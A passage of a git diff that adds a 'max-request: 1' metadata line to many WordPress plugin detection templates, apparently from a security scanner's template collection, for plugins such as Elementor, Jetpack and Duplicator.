a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..b9de0ee313 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..8033aacbc6 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: + max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: 